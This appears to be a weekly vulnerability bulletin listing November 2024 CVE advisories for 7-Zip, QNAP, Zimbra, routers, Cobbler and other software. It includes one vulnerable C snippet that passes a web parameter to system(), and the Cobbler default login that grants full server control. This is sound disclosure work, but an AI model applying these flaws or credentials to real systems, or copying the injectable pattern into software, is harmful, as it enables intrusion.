7-Zip CopyCoder Infinite Loop Denial-of-Service Vulnerability. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of 7-Zip. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the processing of streams. The issue results from a logic error that can lead to an infinite loop. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. Was ZDI-CAN-24307. | 2024-11-22 | not yet calculated | CVE-2024-11612 |
| n/a -- n/a |
A vulnerability classified as critical was found in IPC Unigy Management System 04.03.00.08.0027. Affected by this vulnerability is an unknown functionality of the component HTTP Request Handler. The manipulation leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-22 | not yet calculated | CVE-2024-11618 |
| n/a -- n/a |
A vulnerability, which was classified as problematic, has been found in macrozheng mall up to 1.0.3. Affected by this issue is some unknown functionality of the component JWT Token Handler. The manipulation leads to use of default cryptographic key. The complexity of an attack is rather high. The exploitation is known to be difficult. The vendor was contacted early about this disclosure but did not respond in any way. Instead the issue posted on GitHub got deleted without any explanation. | 2024-11-22 | not yet calculated | CVE-2024-11619 |
| n/a -- n/a |
A vulnerability has been found in E-Lins H685, H685f, H700, H720, H750, H820, H820Q, H820Q0 and H900 up to 3.2 and classified as critical. This vulnerability affects unknown code of the component OEM Backend. The manipulation leads to hard-coded credentials. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-22 | not yet calculated | CVE-2024-11630 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in hardy-barth cph2_echarge_firmware allows OS Command Injection.This issue affects cph2_echarge_firmware: through 2.0.4. | 2024-11-24 | not yet calculated | CVE-2024-11665 |
| n/a -- n/a |
Affected devices beacon to eCharge cloud infrastructure asking if there are any command they should run. This communication is established over an insecure channel since peer verification is disabled everywhere. Therefore, remote unauthenticated users suitably positioned on the network between an EV charger controller and eCharge infrastructure can execute arbitrary commands with elevated privileges on affected devices. This issue affects cph2_echarge_firmware: through 2.0.4. | 2024-11-24 | not yet calculated | CVE-2024-11666 |
| n/a -- n/a |
G DATA Total Security Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of G DATA Total Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the G DATA Backup Service. By creating a symbolic link, an attacker can abuse the service to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22312. | 2024-11-22 | not yet calculated | CVE-2024-1867 |
| n/a -- n/a |
G DATA Total Security Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of G DATA Total Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the G DATA Backup Service. By creating a symbolic link, an attacker can abuse the service to overwrite a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22313. | 2024-11-22 | not yet calculated | CVE-2024-1868 |
| n/a -- n/a |
Versions of the package @eslint/plugin-kit before 0.2.3 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by exploiting this vulnerability. | 2024-11-19 | not yet calculated | CVE-2024-21539 |
| n/a -- n/a |
This High severity RCE (Remote Code Execution) vulnerability was introduced in versions 4.2.8 of Sourcetree for Mac and 3.4.19 for Sourcetree for Windows. This RCE (Remote Code Execution) vulnerability, with a CVSS Score of 8.8, allows an unauthenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction. Atlassian recommends that Sourcetree for Mac and Sourcetree for Windows customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: Sourcetree for Mac 4.2: Upgrade to a release greater than or equal to 4.2.9 Sourcetree for Windows 3.4: Upgrade to a release greater than or equal to 3.4.20 See the release notes ([https://www.sourcetreeapp.com/download-archives]). You can download the latest version of Sourcetree for Mac and Sourcetree for Windows from the download center ([https://www.sourcetreeapp.com/download-archives]). This vulnerability was reported via our Penetration Testing program. | 2024-11-19 | not yet calculated | CVE-2024-21697 |
| n/a -- n/a |
An OS command injection vulnerability exists in the web interface configuration upload functionality of MC Technologies MC LR Router 2.10.5. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2024-11-21 | not yet calculated | CVE-2024-21786 |
| n/a -- n/a |
A lack of authentication vulnerability exists in the HTTP API functionality of GoCast 1.1.3. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an unauthenticated HTTP request to trigger this vulnerability. | 2024-11-21 | not yet calculated | CVE-2024-21855 |
| n/a -- n/a |
Three OS command injection vulnerabilities exist in the web interface I/O configuration functionality of MC Technologies MC LR Router 2.10.5. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability refers to the authenticated OS Command Injection that occurs through the attacker-controlled `btn1` parameter, at offset `0x8eb0`. | 2024-11-21 | not yet calculated | CVE-2024-28025 |
| n/a -- n/a |
Three OS command injection vulnerabilities exist in the web interface I/O configuration functionality of MC Technologies MC LR Router 2.10.5. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability refers to the authenticated OS Command Injection that occurs through the attacker-controlled `out1` parameter, at offset `0x8efc`. int out_ret = sscanf(current_param->key, "out%u", &io_idx); if (out_ret == 1 && io_idx == 1) { // [4] Similar to `3`, but `out1` instead of `btn1` if (asprintf(&command, "/usr/sbin/vout %s %u vo_manual", current_param->value, 1) > 0) { system(command); return -1; } } | 2024-11-21 | not yet calculated | CVE-2024-28026 |
| n/a -- n/a |
Three OS command injection vulnerabilities exist in the web interface I/O configuration functionality of MC Technologies MC LR Router 2.10.5. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability refers to the authetnicated OS Command injection that occurs through the attacker-controlled `timer1` parameter, at offset `0x8e80`. | 2024-11-21 | not yet calculated | CVE-2024-28027 |
| n/a -- n/a |
In RSA NetWitness (NW) Platform before 12.5.1, even when an administrator revokes the access of a specific user with an active session, an internal threat actor could impersonate the revoked user and gain unauthorized access to sensitive data. | 2024-11-18 | not yet calculated | CVE-2024-28058 |
| n/a -- n/a |
An OS command injection vulnerability exists in the name parameter of GoCast 1.1.3. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an unauthenticated HTTP request to trigger this vulnerability. | 2024-11-21 | not yet calculated | CVE-2024-28892 |
| n/a -- n/a |
An OS command injection vulnerability exists in the NAT parameter of GoCast 1.1.3. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an unauthenticated HTTP request to trigger this vulnerability. | 2024-11-21 | not yet calculated | CVE-2024-29224 |
| n/a -- n/a |
Multiple OS Command Injection vulnerabilities affecting Kasda LinkSmart Router KW6512 <= v1.3 enable an authenticated remote attacker to execute arbitrary OS commands via various cgi parameters. | 2024-11-20 | not yet calculated | CVE-2024-29292 |
| n/a -- n/a |
Allegra getLinkText Server-Side Template Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Authentication is required to exploit this vulnerability. The specific flaw exists within the implementation of getLinkText method. The issue results from the lack of proper validation of a user-supplied string before processing it with the template engine. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-23609. | 2024-11-22 | not yet calculated | CVE-2024-30372 |
| n/a -- n/a |
Famatech Advanced IP Scanner Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Famatech Advanced IP Scanner. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the application's use of Qt. The application loads Qt plugins from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of an administrator. Was ZDI-CAN-20768. | 2024-11-22 | not yet calculated | CVE-2024-30376 |
| n/a -- n/a |
G DATA Total Security Scan Server Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of G DATA Total Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the G DATA AntiVirus Scan Server. By creating a symbolic link, an attacker can abuse the service to delete arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-23381. | 2024-11-22 | not yet calculated | CVE-2024-30377 |
| n/a -- n/a |
InfluxDB through 2.7.10 allows allAccess administrators to retrieve all raw tokens via an "influx auth ls" command. NOTE: the supplier indicates that this is intentional but is a "poor design choice" that will be changed in a future release. | 2024-11-21 | not yet calculated | CVE-2024-30896 |
| n/a -- n/a |
Files or Directories Accessible to External Parties, Improper Privilege Management vulnerability in Apache Kafka Clients. Apache Kafka Clients accept configuration data for customizing behavior, and includes ConfigProvider plugins in order to manipulate these configurations. Apache Kafka also provides FileConfigProvider, DirectoryConfigProvider, and EnvVarConfigProvider implementations which include the ability to read from disk or environment variables. In applications where Apache Kafka Clients configurations can be specified by an untrusted party, attackers may use these ConfigProviders to read arbitrary contents of the disk and environment variables. In particular, this flaw may be used in Apache Kafka Connect to escalate from REST API access to filesystem/environment access, which may be undesirable in certain environments, including SaaS products. This issue affects Apache Kafka Clients: from 2.3.0 through 3.5.2, 3.6.2, 3.7.0. Users with affected applications are recommended to upgrade kafka-clients to version >=3.8.0, and set the JVM system property "org.apache.kafka.automatic.config.providers=none". Users of Kafka Connect with one of the listed ConfigProvider implementations specified in their worker config are also recommended to add appropriate "allowlist.pattern" and "allowed.paths" to restrict their operation to appropriate bounds. For users of Kafka Clients or Kafka Connect in environments that trust users with disk and environment variable access, it is not recommended to set the system property. For users of the Kafka Broker, Kafka MirrorMaker 2.0, Kafka Streams, and Kafka command-line tools, it is not recommended to set the system property. | 2024-11-19 | not yet calculated | CVE-2024-31141 |
| n/a -- n/a |
OS command injection vulnerability exists in AIPHONE IX SYSTEM and IXG SYSTEM. A network-adjacent authenticated attacker may execute an arbitrary OS command with root privileges by sending a specially crafted request. | 2024-11-22 | not yet calculated | CVE-2024-31408 |
| n/a -- n/a |
A cross-site scripting (XSS) vulnerability has been reported to affect Photo Station. If exploited, the vulnerability could allow remote attackers who have gained user access to inject malicious code. We have already fixed the vulnerability in the following version: Photo Station 6.4.3 ( 2024/07/12 ) and later | 2024-11-22 | not yet calculated | CVE-2024-32767 |
| n/a -- n/a |
A cross-site scripting (XSS) vulnerability has been reported to affect Photo Station. If exploited, the vulnerability could allow remote attackers who have gained user access to inject malicious code. We have already fixed the vulnerability in the following version: Photo Station 6.4.3 ( 2024/07/12 ) and later | 2024-11-22 | not yet calculated | CVE-2024-32768 |
| n/a -- n/a |
A cross-site scripting (XSS) vulnerability has been reported to affect Photo Station. If exploited, the vulnerability could allow remote attackers who have gained user access to inject malicious code. We have already fixed the vulnerability in the following version: Photo Station 6.4.3 ( 2024/07/12 ) and later | 2024-11-22 | not yet calculated | CVE-2024-32769 |
| n/a -- n/a |
A cross-site scripting (XSS) vulnerability has been reported to affect Photo Station. If exploited, the vulnerability could allow remote attackers who have gained user access to inject malicious code. We have already fixed the vulnerability in the following version: Photo Station 6.4.3 ( 2024/07/12 ) and later | 2024-11-22 | not yet calculated | CVE-2024-32770 |
| n/a -- n/a |
Cross Site Scripting vulnerability in Ferozo Email version 1.1 allows a local attacker to execute arbitrary code via a crafted payload to the PDF preview component. | 2024-11-18 | not yet calculated | CVE-2024-33231 |
| n/a -- n/a |
An issue in Kasda LinkSmart Router KW5515 v1.7 and before allows an authenticated remote attacker to execute arbitrary OS commands via cgi parameters. | 2024-11-20 | not yet calculated | CVE-2024-33439 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Egebilgi Software Website Template allows SQL Injection.This issue affects Website Template: before 29.04.2024. | 2024-11-18 | not yet calculated | CVE-2024-3370 |
| n/a -- n/a |
A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to execute code. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-37041 |
| n/a -- n/a |
A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-37042 |
| n/a -- n/a |
A path traversal vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to read the contents of unexpected files and expose sensitive data. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-37043 |
| n/a -- n/a |
A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to execute code. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-37044 |
| n/a -- n/a |
A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-37045 |
| n/a -- n/a |
A path traversal vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to read the contents of unexpected files and expose sensitive data. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-37046 |
| n/a -- n/a |
A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to execute code. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-37047 |
| n/a -- n/a |
A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-37048 |
| n/a -- n/a |
A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to execute code. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-37049 |
| n/a -- n/a |
A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to execute code. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-37050 |
| n/a -- n/a |
OpenCTI is an open source platform allowing organizations to manage their cyber threat intelligence knowledge and observables. Prior to version 6.1.9, the regex validation used to prevent Introspection queries can be bypassed by removing the extra whitespace, carriage return, and line feed characters from the query. GraphQL Queries in OpenCTI can be validated using the `secureIntrospectionPlugin`. The regex check in the plkugin can be bypassed by removing the carriage return and line feed characters (`\r\n`). Running a curl command against a local instance of OpenCTI will result in a limited error message. By running the same Introspection query without the `\r\n` characters, the unauthenticated user is able to successfully run a full Introspection query. Bypassing this restriction allows the attacker to gather a wealth of information about the GraphQL endpoint functionality that can be used to perform actions and/or read data without authorization. These queries can also be weaponized to conduct a Denial of Service (DoS) attack if sent repeatedly. Users should upgrade to version 6.1.9 to receive a patch for the issue. | 2024-11-18 | not yet calculated | CVE-2024-37155 |
| n/a -- n/a |
An LDAP injection vulnerability in the login page of Gladinet CentreStack v13.12.9934.54690 allows attackers to access sensitive data or execute arbitrary commands via a crafted payload injected into the username field. | 2024-11-22 | not yet calculated | CVE-2024-37782 |
| n/a -- n/a |
A reflected cross-site scripting (XSS) vulnerability in Gladinet CentreStack v13.12.9934.54690 allows attackers to inject malicious JavaScript into the web browser of a victim via the sessionId parameter at /portal/ForgotPassword.aspx. | 2024-11-22 | not yet calculated | CVE-2024-37783 |
| n/a -- n/a |
Dell Edge Gateway 5200 (Coffee Lake S), versions prior to 12.0.94.2380, contains an Exposure of Sensitive Information in Shared Microarchitectural Structures during Transient Execution vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to information exposure. | 2024-11-22 | not yet calculated | CVE-2024-38296 |
| n/a -- n/a |
A missing authentication for critical function vulnerability has been reported to affect Notes Station 3. If exploited, the vulnerability could allow remote attackers to gain access to and execute certain functions. We have already fixed the vulnerability in the following version: Notes Station 3 3.9.7 and later | 2024-11-22 | not yet calculated | CVE-2024-38643 |
| n/a -- n/a |
An OS command injection vulnerability has been reported to affect Notes Station 3. If exploited, the vulnerability could allow remote authenticated attackers to execute commands. We have already fixed the vulnerability in the following version: Notes Station 3 3.9.7 and later | 2024-11-22 | not yet calculated | CVE-2024-38644 |
| n/a -- n/a |
A server-side request forgery (SSRF) vulnerability has been reported to affect Notes Station 3. If exploited, the vulnerability could allow remote authenticated attackers to read application data. We have already fixed the vulnerability in the following version: Notes Station 3 3.9.7 and later | 2024-11-22 | not yet calculated | CVE-2024-38645 |
| n/a -- n/a |
An incorrect permission assignment for critical resource vulnerability has been reported to affect Notes Station 3. If exploited, the vulnerability could allow local authenticated attackers who have gained administrator access to read or modify the resource. We have already fixed the vulnerability in the following version: Notes Station 3 3.9.7 and later | 2024-11-22 | not yet calculated | CVE-2024-38646 |
| n/a -- n/a |
An exposure of sensitive information vulnerability has been reported to affect QNAP AI Core. If exploited, the vulnerability could allow remote attackers to compromise the security of the system. We have already fixed the vulnerability in the following version: QNAP AI Core 3.4.1 and later | 2024-11-22 | not yet calculated | CVE-2024-38647 |
| n/a -- n/a |
Spring MVC controller methods with an @RequestBody byte[] method parameter are vulnerable to a DoS attack. | 2024-11-18 | not yet calculated | CVE-2024-38828 |
| n/a -- n/a |
Insufficiently protected credentials issue exists in AIPHONE IX SYSTEM and IXG SYSTEM. A network-adjacent unauthenticated attacker may obtain sensitive information such as a username and its password in the address book. | 2024-11-22 | not yet calculated | CVE-2024-39290 |
| n/a -- n/a |
Deserialization of Untrusted Data vulnerability in Apache HertzBeat. This vulnerability can only be exploited by authorized attackers. This issue affects Apache HertzBeat: before 1.6.1. Users are recommended to upgrade to version 1.6.1, which fixes the issue. | 2024-11-18 | not yet calculated | CVE-2024-41151 |
| n/a -- n/a |
The Versa Director uses PostgreSQL (Postgres) to store operational and configuration data. It is also needed for High Availability function of the Versa Director. The default configuration has a common password across all instances of Versa Director. By default, Versa Director configures Postgres to listen on all network interfaces. This combination allows an unauthenticated attacker to access and administer the database or read local filesystem contents to escalate privileges on the system. Exploitation Status: Versa Networks is not aware of this exploitation in any production systems. A proof of concept exists in the lab environment. Workarounds or Mitigation: Starting with the latest 22.1.4 version of Versa Director, the software will automatically restrict access to the Postgres and HA ports to only the local and peer Versa Directors. For older releases, Versa recommends performing manual hardening of HA ports. Please refer to the following link for the steps https://docs.versa-networks.com/Solutions/System_Hardening/Perform_Manual_Hardening_for_Versa_Director#Secure_HA_Ports This vulnerability is not exploitable on Versa Directors if published Firewall guidelines are implemented. We have validated that no Versa-hosted head ends have been affected by this vulnerability. All Versa-hosted head ends are patched and hardened. Please contact Versa Technical Support or Versa account team for any further assistance. Software Download Links: 22.1.4: https://support.versa-networks.com/support/solutions/articles/23000026708-release-22-1-4 | 2024-11-19 | not yet calculated | CVE-2024-42450 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Automattic, Inc. Crowdsignal Dashboard - Polls, Surveys & more allows Cross Site Request Forgery.This issue affects Crowdsignal Dashboard - Polls, Surveys & more: from n/a through 3.1.2. | 2024-11-19 | not yet calculated | CVE-2024-43338 |
| n/a -- n/a |
GLPI is a free asset and IT management software package. Starting in version 0.80 and prior to version 10.0.17, an unauthenticated user can use an application endpoint to check if an email address corresponds to a valid GLPI user. Version 10.0.17 fixes the issue. | 2024-11-18 | not yet calculated | CVE-2024-43416 |
| n/a -- n/a |
Software installed and run as a non-privileged user may conduct improper GPU system calls to gain access to the graphics buffers of a parent process. | 2024-11-18 | not yet calculated | CVE-2024-43704 |
| n/a -- n/a |
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.6. An app may be able to execute arbitrary code with kernel privileges. | 2024-11-20 | not yet calculated | CVE-2024-44306 |
| n/a -- n/a |
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.6. An app may be able to execute arbitrary code with kernel privileges. | 2024-11-20 | not yet calculated | CVE-2024-44307 |
| n/a -- n/a |
The issue was addressed with improved checks. This issue is fixed in Safari 18.1.1, iOS 17.7.2 and iPadOS 17.7.2, macOS Sequoia 15.1.1, iOS 18.1.1 and iPadOS 18.1.1, visionOS 2.1.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems. | 2024-11-20 | not yet calculated | CVE-2024-44308 |
| n/a -- n/a |
A cookie management issue was addressed with improved state management. This issue is fixed in Safari 18.1.1, iOS 17.7.2 and iPadOS 17.7.2, macOS Sequoia 15.1.1, iOS 18.1.1 and iPadOS 18.1.1, visionOS 2.1.1. Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems. | 2024-11-20 | not yet calculated | CVE-2024-44309 |
| n/a -- n/a |
NUS-M9 ERP Management Software v3.0.0 was discovered to contain a SQL injection vulnerability via the usercode parameter at /UserWH/checkLogin. | 2024-11-18 | not yet calculated | CVE-2024-44756 |
| n/a -- n/a |
An arbitrary file download vulnerability in the component /Basics/DownloadInpFile of NUS-M9 ERP Management Software v3.0.0 allows attackers to download arbitrary files and access sensitive information via a crafted interface request. | 2024-11-18 | not yet calculated | CVE-2024-44757 |
| n/a -- n/a |
Incorrect access control in Meabilis CMS 1.0 allows attackers to access other users' address books via unspecified vectors. | 2024-11-22 | not yet calculated | CVE-2024-44786 |
| n/a -- n/a |
In Zimbra Collaboration (ZCS) 9.0 and 10.0, a vulnerability in the Webmail Modern UI allows execution of stored Cross-Site Scripting (XSS) payloads. An attacker with administrative access to the Zimbra Administration Panel can inject malicious JavaScript code while configuring an email account. This injected code is stored on the server and executed in the context of the victim's browser when interacting with specific elements in the web interface. (The vulnerability can be mitigated by properly sanitizing input parameters to prevent the injection of malicious code.) | 2024-11-21 | not yet calculated | CVE-2024-45194 |
| n/a -- n/a |
The web application uses a weak authentication mechanism to verify that a request is coming from an authenticated and authorized resource. | 2024-11-22 | not yet calculated | CVE-2024-45369 |
| n/a -- n/a |
Improper input validation in some Zoom Apps may allow an unauthenticated user to conduct a disclosure of information via network access. | 2024-11-19 | not yet calculated | CVE-2024-45419 |
| n/a -- n/a |
Uncontrolled resource consumption in some Zoom Apps before version 6.2.0 may allow an authenticated user to conduct a denial of service via network access. | 2024-11-19 | not yet calculated | CVE-2024-45420 |
| n/a -- n/a |
Improper input validation in some Zoom Apps before version 6.2.0 may allow an unauthenticated user to conduct a denial of service via network access. | 2024-11-19 | not yet calculated | CVE-2024-45422 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache HertzBeat (incubating). This vulnerability can only be exploited by authorized attackers. This issue affects Apache HertzBeat (incubating): before 1.6.1. Users are recommended to upgrade to version 1.6.1, which fixes the issue. | 2024-11-18 | not yet calculated | CVE-2024-45505 |
| n/a -- n/a |
An issue was discovered in Zimbra Collaboration (ZCS) through 10.0. Zimbra Webmail (Modern UI) is vulnerable to a stored Cross-Site Scripting (XSS) attack due to improper sanitization of user input. This allows an attacker to inject malicious code into specific fields of an e-mail message. When the victim adds the attacker to their contacts, the malicious code is stored and executed when viewing the contact list. This can lead to unauthorized actions such as arbitrary mail sending, mailbox exfiltration, profile picture alteration, and other malicious actions. Proper sanitization and escaping of input fields are necessary to mitigate this vulnerability. | 2024-11-20 | not yet calculated | CVE-2024-45510 |
| n/a -- n/a |
An issue was discovered in Zimbra Collaboration (ZCS) through 10.1. A reflected Cross-Site Scripting (XSS) issue exists through the Briefcase module due to improper sanitization of file content by the OnlyOffice formatter. This occurs when the victim opens a crafted URL pointing to a shared folder containing a malicious file uploaded by the attacker. The vulnerability allows the attacker to execute arbitrary JavaScript in the context of the victim's session. | 2024-11-20 | not yet calculated | CVE-2024-45511 |
| n/a -- n/a |
An issue was discovered in webmail in Zimbra Collaboration (ZCS) through 10.1. An attacker can exploit this vulnerability by creating a folder in the Briefcase module with a malicious payload and sharing it with a victim. When the victim interacts with the folder share notification, the malicious script executes in their browser. This stored Cross-Site Scripting (XSS) vulnerability can lead to unauthorized actions within the victim's session. | 2024-11-21 | not yet calculated | CVE-2024-45512 |
| n/a -- n/a |
An issue was discovered in Zimbra Collaboration (ZCS) through 10.1. A stored Cross-Site Scripting (XSS) vulnerability exists in the /modern/contacts/print endpoint of Zimbra webmail. This allows an attacker to inject and execute arbitrary JavaScript code in the context of the victim's browser when a crafted vCard (VCF) file is processed and printed. This could lead to unauthorized actions within the victim's session. | 2024-11-21 | not yet calculated | CVE-2024-45513 |
| n/a -- n/a |
An issue was discovered in Zimbra Collaboration (ZCS) through v10.1. A Cross-Site Scripting (XSS) vulnerability exists in one of the endpoints of Zimbra Webmail due to insufficient sanitization of the packages parameter. Attackers can bypass the existing checks by using encoded characters, allowing the injection and execution of arbitrary JavaScript within a victim's session. | 2024-11-21 | not yet calculated | CVE-2024-45514 |
| n/a -- n/a |
An issue was discovered in Zimbra Collaboration (ZCS) through 10.1. A Cross-Site Scripting (XSS) vulnerability in the /h/rest endpoint of the Zimbra webmail and admin panel interfaces allows attackers to execute arbitrary JavaScript in the victim's session. This issue is caused by improper sanitization of user input, leading to potential compromise of sensitive information. Exploitation requires user interaction to access the malicious URL. | 2024-11-21 | not yet calculated | CVE-2024-45517 |
| n/a -- n/a |
A flaw was found in Moodle. Dynamic tables did not enforce capability checks, which resulted in users having the ability to retrieve information they did not have permission to access. | 2024-11-20 | not yet calculated | CVE-2024-45689 |
| n/a -- n/a |
A flaw was found in Moodle. Additional checks were required to ensure users can only delete their OAuth2-linked accounts. | 2024-11-20 | not yet calculated | CVE-2024-45690 |
| n/a -- n/a |
A flaw was found in Moodle. When restricting access to a lesson activity with a password, certain passwords could be bypassed or less secure due to a loose comparison in the password-checking logic. This issue only affected passwords set to "magic hash" values. | 2024-11-20 | not yet calculated | CVE-2024-45691 |
| n/a -- n/a |
Inadequate Encryption Strength vulnerability in Apache Answer. This issue affects Apache Answer: through 1.4.0. The ids generated using the UUID v1 version are to some extent not secure enough. It can cause the generated token to be predictable. Users are recommended to upgrade to version 1.4.1, which fixes the issue. | 2024-11-22 | not yet calculated | CVE-2024-45719 |
| n/a -- n/a |
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache HertzBeat. This issue affects Apache HertzBeat: before 1.6.1. Users are recommended to upgrade to version 1.6.1, which fixes the issue. | 2024-11-18 | not yet calculated | CVE-2024-45791 |
| n/a -- n/a |
Use of hard-coded cryptographic key issue exists in AIPHONE IX SYSTEM, IXG SYSTEM, and System Support Software. A network-adjacent unauthenticated attacker may log in to SFTP service and obtain and/or manipulate unauthorized files. | 2024-11-22 | not yet calculated | CVE-2024-45837 |
| n/a -- n/a |
The administrative interface listens by default on all interfaces on a TCP port and does not require authentication when being accessed. | 2024-11-22 | not yet calculated | CVE-2024-47138 |
| n/a -- n/a |
AIPHONE IXG SYSTEM IXG-2C7 firmware Ver.2.03 and earlier and IXG-2C7-L firmware Ver.2.03 and earlier contain an issue with insufficiently protected credentials, which may allow a network-adjacent authenticated attacker to perform unintended operations. | 2024-11-22 | not yet calculated | CVE-2024-47142 |
| n/a -- n/a |
Server-Side Request Forgery (SSRF), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.17. Users are recommended to upgrade to version 18.12.17, which fixes the issue. | 2024-11-18 | not yet calculated | CVE-2024-47208 |
| n/a -- n/a |
A parameter within a command does not properly validate input within myPRO Manager which could be exploited by an unauthenticated remote attacker to inject arbitrary operating system commands. | 2024-11-22 | not yet calculated | CVE-2024-47407 |
| n/a -- n/a |
Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue. | 2024-11-18 | not yet calculated | CVE-2024-47533 |
| n/a -- n/a |
